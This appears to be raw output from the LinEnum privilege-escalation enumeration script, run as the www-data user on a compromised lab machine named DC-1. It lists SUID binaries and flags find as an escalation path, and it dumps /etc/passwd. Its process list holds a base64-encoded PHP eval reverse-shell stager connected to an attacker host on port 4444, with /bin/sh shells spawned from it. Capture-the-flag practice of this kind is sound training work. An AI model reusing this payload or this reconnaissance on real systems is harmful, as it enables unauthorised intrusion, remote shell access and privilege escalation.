[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
583
[-] SUID files:
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs
605
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
609
[-] SGID files:
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd
626
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
635 [00;31m[-] All *.conf files in /etc (recursive 1 level): [00m636 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf637 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf638 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf639 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf640 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf641 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf643 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf644 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf646 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf647 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf648 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf649 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf650 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf651 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf652 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf653 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf654 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf656 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf657 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf659 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf660
661
[-] Location and contents (if accessible) of .bash_history file(s):
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit
670
671 [00;31m[-] Any interesting mail in /var/mail: [00m672 total 8673 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..675
676
677 [00;33m### SCAN COMPLETE #################################### [00m678
679 [00;31m######################################################### [00m680 [00;31m# [00m [00;33mLocal Linux Enumeration & Privilege Escalation Script [00m [00;31m# [00m681 [00;31m######################################################### [00m682 [00;33m# www.rebootuser.com [00m683 [00;33m# version 0.95 [00m684
685 [-] Debug Info686 [00;33m[+] Thorough tests = Disabled [00m687
688
689 [00;33mScan started at:690 Tue May 7 01:08:52 AEST 2019691 [00m692
693 [00;33m### SYSTEM ############################################## [00m694 [00;31m[-] Kernel information: [00m695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux696
697
698 [00;31m[-] Kernel information (continued): [00m699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1700
701
702 [00;31m[-] Specific release information: [00m703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"704 NAME="Debian GNU/Linux"705 VERSION_ID="7"706 VERSION="7 (wheezy)"707 ID=debian708 ANSI_COLOR="1;31"709 HOME_URL="http://www.debian.org/"710 SUPPORT_URL="http://www.debian.org/support/"711 BUG_REPORT_URL="http://bugs.debian.org/"712
713
714 [00;31m[-] Hostname: [00m715 DC-1716
717
### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
722
723 [00;31m[-] Users that have previously logged onto the system: [00m724 Username Port From Latest725 root tty1 Thu Feb 28 12:10:51 +1000 2019726
727
728 [00;31m[-] Who else is logged on: [00m729 01:08:52 up 1:00, 0 users, load average: 0.00, 0.00, 0.00730 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT731
732
733 [00;31m[-] Group memberships: [00m734 uid=0(root) gid=0(root) groups=0(root)735 uid=1(daemon) gid=1(daemon) groups=1(daemon)736 uid=2(bin) gid=2(bin) groups=2(bin)737 uid=3(sys) gid=3(sys) groups=3(sys)738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)739 uid=5(games) gid=60(games) groups=60(games)740 uid=6(man) gid=12(man) groups=12(man)741 uid=7(lp) gid=7(lp) groups=7(lp)742 uid=8(mail) gid=8(mail) groups=8(mail)743 uid=9(news) gid=9(news) groups=9(news)744 uid=10(uucp) gid=10(uucp) groups=10(uucp)745 uid=13(proxy) gid=13(proxy) groups=13(proxy)746 uid=33(www-data) gid=33(www-data) groups=33(www-data)747 uid=34(backup) gid=34(backup) groups=34(backup)748 uid=38(list) gid=38(list) groups=38(list)749 uid=39(irc) gid=39(irc) groups=39(irc)750 uid=41(gnats) gid=41(gnats) groups=41(gnats)751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)757 uid=105(mysql) gid=109(mysql) groups=109(mysql)758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)759
760
761 [00;31m[-] Contents of /etc/passwd: [00m762 root:x:0:0:root:/root:/bin/bash763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh764 bin:x:2:2:bin:/bin:/bin/sh765 sys:x:3:3:sys:/dev:/bin/sh766 sync:x:4:65534:sync:/bin:/bin/sync767 games:x:5:60:games:/usr/games:/bin/sh768 man:x:6:12:man:/var/cache/man:/bin/sh769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh770 mail:x:8:8:mail:/var/mail:/bin/sh771 news:x:9:9:news:/var/spool/news:/bin/sh772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh773 proxy:x:13:13:proxy:/bin:/bin/sh774 www-data:x:33:33:www-data:/var/www:/bin/sh775 backup:x:34:34:backup:/var/backups:/bin/sh776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false782 statd:x:102:65534::/var/lib/nfs:/bin/false783 messagebus:x:103:107::/var/run/dbus:/bin/false784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash787
788
[-] Super user account(s):
root
792
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4
799
[-] Root is allowed to login via SSH:
PermitRootLogin yes
803
804 [00;33m### ENVIRONMENTAL ####################################### [00m805 [00;31m[-] Environment information: [00m806 APACHE_PID_FILE=/var/run/apache2.pid807 APACHE_RUN_USER=www-data808 APACHE_LOG_DIR=/var/log/apache2809 PATH=/usr/local/bin:/usr/bin:/bin810 PWD=/var/www811 APACHE_RUN_GROUP=www-data812 LANG=C813 SHLVL=1814 APACHE_LOCK_DIR=/var/lock/apache2815 APACHE_RUN_DIR=/var/run/apache2816 _=/usr/bin/env817
818
819 [00;31m[-] Path information: [00m820 /usr/local/bin:/usr/bin:/bin821
822
823 [00;31m[-] Available shells: [00m824 # /etc/shells: valid login shells825 /bin/sh826 /bin/dash827 /bin/bash828 /bin/rbash829
830
831 [00;31m[-] Current umask value: [00m832 0022833 u=rwx,g=rx,o=rx834
835
836 [00;31m[-] umask value as specified in /etc/login.defs: [00m837 UMASK 022838
839
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
846
847 [00;33m### JOBS/TASKS ########################################## [00m848 [00;31m[-] Cron jobs: [00m849 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab850
851 /etc/cron.d:852 total 16853 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .854 drwxr-xr-x 85 root root 4096 May 7 01:08 ..855 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder856 -rw-r--r-- 1 root root 510 May 10 2018 php5857
858 /etc/cron.daily:859 total 68860 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .861 drwxr-xr-x 85 root root 4096 May 7 01:08 ..862 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder863 -rwxr-xr-x 1 root root 633 May 30 2018 apache2864 -rwxr-xr-x 1 root root 14985 Oct 24 2014 apt865 -rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude866 -rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils867 -rwxr-xr-x 1 root root 256 May 3 2016 dpkg868 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base869 -rwxr-xr-x 1 root root 89 May 17 2012 logrotate870 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db871 -rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate872 -rwxr-xr-x 1 root root 249 May 26 2012 passwd873
874 /etc/cron.hourly:875 total 12876 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .877 drwxr-xr-x 85 root root 4096 May 7 01:08 ..878 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder879
880 /etc/cron.monthly:881 total 12882 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .883 drwxr-xr-x 85 root root 4096 May 7 01:08 ..884 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder885
886 /etc/cron.weekly:887 total 16888 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .889 drwxr-xr-x 85 root root 4096 May 7 01:08 ..890 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder891 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db892
893
894 [00;31m[-] Crontab contents: [00m895 # /etc/crontab: system-wide crontab896 # Unlike any other crontab you don't have to run the `crontab'897 # command to install the new version when you edit this file898 # and files in /etc/cron.d. These files also have username fields,899 # that none of the other crontabs do.900
901 SHELL=/bin/sh902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin903
904 # m h dom mon dow user command905 17 * * * * root cd / && run-parts --report /etc/cron.hourly906 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )907 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )908 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )909 #910
911
912 [00;33m### NETWORKING ########################################## [00m913 [00;31m[-] Network and IP info: [00m914 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98915 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0916 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link917 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1918 RX packets:8711 errors:0 dropped:0 overruns:0 frame:0919 TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0920 collisions:0 txqueuelen:1000921 RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB)922
923 lo Link encap:Local Loopback924 inet addr:127.0.0.1 Mask:255.0.0.0925 inet6 addr: ::1/128 Scope:Host926 UP LOOPBACK RUNNING MTU:16436 Metric:1927 RX packets:50 errors:0 dropped:0 overruns:0 frame:0928 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0929 collisions:0 txqueuelen:0930 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB)931
932
933 [00;31m[-] ARP history: [00m934 192.168.16.112 dev eth0 INCOMPLETE935
936
937 [00;31m[-] Nameserver(s): [00m938 nameserver 192.168.16.254939 nameserver 0.0.0.0940
941
942 [00;31m[-] Default route: [00m943 default via 192.168.16.254 dev eth0944
945
946 [00;31m[-] Listening TCP: [00m947 Active Internet connections (servers and established)948 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name949 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -950 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -951 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -952 tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -953 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -954 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php955 tcp6 0 0 :::22 :::* LISTEN -956 tcp6 0 0 ::1:25 :::* LISTEN -957 tcp6 0 0 :::34190 :::* LISTEN -958 tcp6 0 0 :::111 :::* LISTEN -959 tcp6 0 0 :::80 :::* LISTEN -960 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -961 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT -962
963
964 [00;31m[-] Listening UDP: [00m965 Active Internet connections (servers and established)966 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name967 udp 0 0 0.0.0.0:59942 0.0.0.0:* -968 udp 0 0 0.0.0.0:68 0.0.0.0:* -969 udp 0 0 0.0.0.0:111 0.0.0.0:* -970 udp 0 0 0.0.0.0:769 0.0.0.0:* -971 udp 0 0 127.0.0.1:801 0.0.0.0:* -972 udp 0 0 0.0.0.0:21881 0.0.0.0:* -973 udp6 0 0 :::52815 :::* -974 udp6 0 0 :::28256 :::* -975 udp6 0 0 :::111 :::* -976 udp6 0 0 :::769 :::* -977
978
979 [00;33m### SERVICES ############################################# [00m980 [00;31m[-] Running processes: [00m981 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND982 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]983 root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]984 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]985 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]986 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]987 root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]988 root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]989 root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]990 root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]991 root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]992 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]993 root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]994 root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]995 root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]996 root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]997 root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]998 root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]999 root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]1000 root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]1001 root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]1002 root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]1003 root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]1004 root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]1005 root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]1006 root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]1007 root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]1008 root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]1009 root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]1010 root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]1011 root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]1012 root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]1013 root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]1014 root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]1015 root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]1016 root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]1017 root 147 0.0 0.0 0 0 ? 
S 00:08 0:00 [scsi_eh_15]1018 root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]1019 root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]1020 root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]1021 root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]1022 root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]1023 root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]1024 root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]1025 root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]1026 root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]1027 root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]1028 root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]1029 root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]1030 root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]1031 root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]1032 root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]1033 root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]1034 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]1035 root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]1036 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]1037 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]1038 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon1039 root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]1040 root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]1041 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w1042 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd1043 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon1044 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]1045 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]1046 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd1047 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c51048 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid1049 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start1050 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd1051 103 2353 0.0 0.0 3032 644 ? 
Ss 00:08 0:00 /usr/bin/dbus-daemon --system1052 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start1053 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start1054 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start1055 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start1056 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron1057 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe1058 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=33061059 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error1060 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m1061 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty21062 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty31063 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty41064 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty51065 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty61066 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]1067 root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth01068 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd1069 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty11070 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start1071 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start1072 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start1073 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start1074 www-data 3385 0.0 1.2 47436 13392 ? 
S 00:32 0:00 /usr/sbin/apache2 -k start1075 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start1076 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(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.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'1077 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(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.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));1078 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh1079 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh1080 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]1081 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]1082 www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1083 www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1084 www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a1085 www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1086 www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux1087
1088
1089 [00;31m[-] Process binaries and associated permissions (from above list): [00m1090 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash1091 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash1092 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty1093 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd1094 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind1095 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon1096 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid1097 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache21098 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd1099 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron1100 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim41101 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld1102 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd1103 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd1104 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd1105
1106
